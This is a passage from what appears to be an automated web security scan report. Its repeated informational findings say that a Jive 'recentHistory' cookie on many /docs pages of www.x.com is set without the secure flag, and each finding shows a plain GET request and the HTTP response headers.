Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313433313b3130322c313333323b3130322c313337343b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b3130322c323234313b3130322c333237313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:09 GMT; Path=/
Vary: User-Agent
JP: D=208093 t=1313157248979182
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.106. https://www.x.com/docs/DOC-1551

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1551

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1551 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313535313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333335313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335343b3130322c333335353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:03 GMT; Path=/
Vary: User-Agent
JP: D=196106 t=1313157243446476
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.107. https://www.x.com/docs/DOC-1613

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-1613

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-1613 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c313631333b3130322c313337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:47 GMT; Path=/
Vary: User-Agent
JP: D=254809 t=1313157226947806
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.108. https://www.x.com/docs/DOC-2241

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2241

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-2241 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323234313b3130322c333237313b3130322c333332313b3130322c333335323b3130322c333332323b3130322c333335313b3130322c333335333b3130322c333335343b3130322c333335353b3130322c333334353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=129237 t=1313157242766813
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.109. https://www.x.com/docs/DOC-2346

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-2346

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-2346 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c323334363b3130322c313433313b3130322c313130363b3130322c313337343b3130322c313333323b3130322c313034313b3130322c313130383b3130322c333833363b3130322c313535313b3130322c333230313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:11 GMT; Path=/
Vary: User-Agent
JP: D=90261 t=1313157251251583
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.110. https://www.x.com/docs/DOC-3201

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3201

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3201 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333230313b3130322c333332313b3130322c323234313b3130322c333237313b3130322c333332323b3130322c313535313b3130322c333335313b3130322c333335323b3130322c333335333b3130322c333335343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:04 GMT; Path=/
Vary: User-Agent
JP: D=167625 t=1313157243865563
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.111. https://www.x.com/docs/DOC-3212

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3212

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3212 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337343b3130322c333337333b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=98683 t=1313157237758028
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.112. https://www.x.com/docs/DOC-3251

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3251

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3251 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333235313b3130322c333432373b3130322c333337353b3130322c333432363b3130322c333433313b3130322c333434333b3130322c333439313b3130322c333434343b3130322c333536313b3130322c333536323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:55 GMT; Path=/
Vary: User-Agent
JP: D=152122 t=1313157235677820
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.113. https://www.x.com/docs/DOC-3271

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3271

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3271 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333237313b3130322c333335333b3130322c333332313b3130322c333332323b3130322c333335323b3130322c333335313b3130322c333335343b3130322c333335353b3130322c333334353b3130322c333332333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:02 GMT; Path=/
Vary: User-Agent
JP: D=202196 t=1313157242055016
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.114. https://www.x.com/docs/DOC-3321

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3321

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3321 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332313b3130322c333332323b3130322c333335323b3130322c333335333b3130322c333335313b3130322c333335343b3130322c333335353b3130322c333334353b3130322c333332333b3130322c333231323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:01 GMT; Path=/
Vary: User-Agent
JP: D=175031 t=1313157241647991
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.115. https://www.x.com/docs/DOC-3322

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3322

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3322 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332323b3130322c333335313b3130322c333335353b3130322c333335323b3130322c333335343b3130322c333335333b3130322c333334353b3130322c333332333b3130322c333231323b3130322c333337313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:01 GMT; Path=/
Vary: User-Agent
JP: D=109738 t=1313157241231678
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.116. https://www.x.com/docs/DOC-3323

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3323

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3323 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337343b3130322c333337323b3130322c333337333b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:58 GMT; Path=/
Vary: User-Agent
JP: D=133918 t=1313157238141945
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.117. https://www.x.com/docs/DOC-3345

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3345

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3345 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333334353b3130322c333337313b3130322c333231323b3130322c333337323b3130322c333337333b3130322c333332333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:58 GMT; Path=/
Vary: User-Agent
JP: D=125907 t=1313157238612169
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.118. https://www.x.com/docs/DOC-3351

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3351

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3351 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335313b3130322c333335323b3130322c333335333b3130322c333334353b3130322c333335343b3130322c333335353b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=138250 t=1313157240721784
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.119. https://www.x.com/docs/DOC-3352

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3352

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3352 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335323b3130322c333335333b3130322c333332333b3130322c333335343b3130322c333334353b3130322c333335353b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=134617 t=1313157240348745
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.120. https://www.x.com/docs/DOC-3353

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3353

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3353 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335333b3130322c333335343b3130322c333334353b3130322c333335353b3130322c333332333b3130322c333231323b3130322c333337313b3130322c333337323b3130322c333337333b3130322c333337343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:54:00 GMT; Path=/
Vary: User-Agent
JP: D=99945 t=1313157239993132
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.121. https://www.x.com/docs/DOC-3354

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3354

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3354 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335343b3130322c333335353b3130322c333337313b3130322c333332333b3130322c333334353b3130322c333231323b3130322c333337323b3130322c333337333b3130322c333337343b3130322c333235313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:59 GMT; Path=/
Vary: User-Agent
JP: D=125676 t=1313157239533114
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.122. https://www.x.com/docs/DOC-3355

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3355

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3355 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:58 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333335353b3130322c333334353b3130322c333231323b3130322c333332333b3130322c333337313b3130322c333337333b3130322c333337323b3130322c333337343b3130322c333235313b3130322c333337353b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:59 GMT; Path=/
Vary: User-Agent
JP: D=160248 t=1313157238946488
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.123. https://www.x.com/docs/DOC-3371

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3371

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3371 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337313b3130322c333337323b3130322c333337333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=131293 t=1313157237278257
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.124. https://www.x.com/docs/DOC-3372

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3372

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3372 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337323b3130322c333337333b3130322c333337353b3130322c333235313b3130322c333337343b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:57 GMT; Path=/
Vary: User-Agent
JP: D=129449 t=1313157236932252
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.125. https://www.x.com/docs/DOC-3373

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /docs/DOC-3373

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /docs/DOC-3373 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:53:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b3130322c333337333b3130322c333337343b3130322c333235313b3130322c333337353b3130322c333433313b3130322c333432363b3130322c333432373b3130322c333434333b3130322c333439313b3130322c333434343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:53:56 GMT; Path=/
Vary: User-Agent
JP: D=131465 t=1313157236591127
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.126. https://www.x.com/docs/DOC-3374

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
